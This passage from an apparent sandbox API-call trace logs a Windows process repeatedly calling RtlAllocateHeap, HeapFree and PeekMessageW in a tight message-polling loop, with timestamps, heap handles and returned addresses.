hHeap=0x12c0000) returned 1 [0135.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0135.070] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0135.071] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0135.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0135.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0135.071] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0135.071] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0135.071] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0135.072] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0135.072] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0135.072] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0135.072] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0135.072] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0135.073] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0135.073] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0135.073] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0135.073] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0135.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0135.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.074] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.074] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0135.074] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0135.074] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0135.075] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0135.075] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0135.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0135.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.075] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.075] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0135.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0135.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0135.076] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0135.076] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0135.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0135.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0135.076] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0135.076] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0135.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0135.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0135.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0135.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0135.078] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0135.078] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0135.078] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0135.079] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0135.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0135.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0135.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0135.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0135.079] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0135.079] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0135.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0135.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0135.080] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0135.080] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0135.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0135.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0135.080] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0135.080] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0135.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0135.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0135.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0135.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0135.081] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0135.081] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0135.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0135.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0135.081] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, 